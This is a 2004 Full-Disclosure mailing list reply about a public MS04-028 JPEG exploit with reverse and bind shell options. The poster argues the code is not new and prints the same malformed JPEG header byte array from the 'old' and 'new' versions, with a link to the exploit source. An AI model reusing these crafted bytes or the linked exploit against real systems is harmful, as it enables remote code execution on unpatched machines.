[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
Re: [Full-Disclosure] MS04-028 Jpeg EXPLOIT with Reverse and Bind shell ...
- To: <full-disclosure@xxxxxxxxxxxxxxxx>
- Subject: Re: [Full-Disclosure] MS04-028 Jpeg EXPLOIT with Reverse and Bind shell ...
- From: "morning_wood" <se_cur_ity@xxxxxxxxxxx>
- Date: Sat, 25 Sep 2004 11:05:50 -0700
umm, no
all this has thats different is correct headers for bind or remote shell
option.
and ability to set ports and return ip in the code, instead of needing to
use your own shellcode ( or metasploits ) note: there is no new exploit code
or vector
------------------- / snip /-----------------
new.
char header1[] =
"\xFF\xD8\xFF\xE0\x00\x10\x4A\x46\x49\x46\x00\x01\x02\x00\x00\x64"
"\x00\x64\x00\x00\xFF\xEC\x00\x11\x44\x75\x63\x6B\x79\x00\x01\x00"
"\x04\x00\x00\x00\x0A\x00\x00\xFF\xEE\x00\x0E\x41\x64\x6F\x62\x65"
"\x00\x64\xC0\x00\x00\x00\x01\xFF\xFE\x00\x01\x00\x14\x10\x10\x19"
"\x12\x19\x27\x17\x17\x27\x32\xEB\x0F\x26\x32\xDC\xB1\xE7\x70\x26"
"\x2E\x3E\x35\x35\x35\x35\x35\x3E";
------------------- / snip /-----------------
old.
------------------- / snip /-----------------
char header1[]=
"\xFF\xD8\xFF\xE0\x00\x10\x4A\x46\x49\x46\x00\x01\x02\x00\x00\x64"
"\x00\x64\x00\x00\xFF\xEC\x00\x11\x44\x75\x63\x6B\x79\x00\x01\x00"
"\x04\x00\x00\x00\x0A\x00\x00\xFF\xEE\x00\x0E\x41\x64\x6F\x62\x65"
"\x00\x64\xC0\x00\x00\x00\x01\xFF\xFE\x00\x01\x00\x14\x10\x10\x19"
"\x12\x19\x27\x17\x17\x27\x32\xEB\x0F\x26\x32\xDC\xB1\xE7\x70\x26"
"\x2E\x3E\x35\x35\x35\x35\x35\x3E";
------------------- / snip /-----------------
take your media hype and die kthnx,
m.wood
> the last step before the worm
>
> http://www.k-otik.com/exploits/09252004.JpegOfDeath.c.php
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html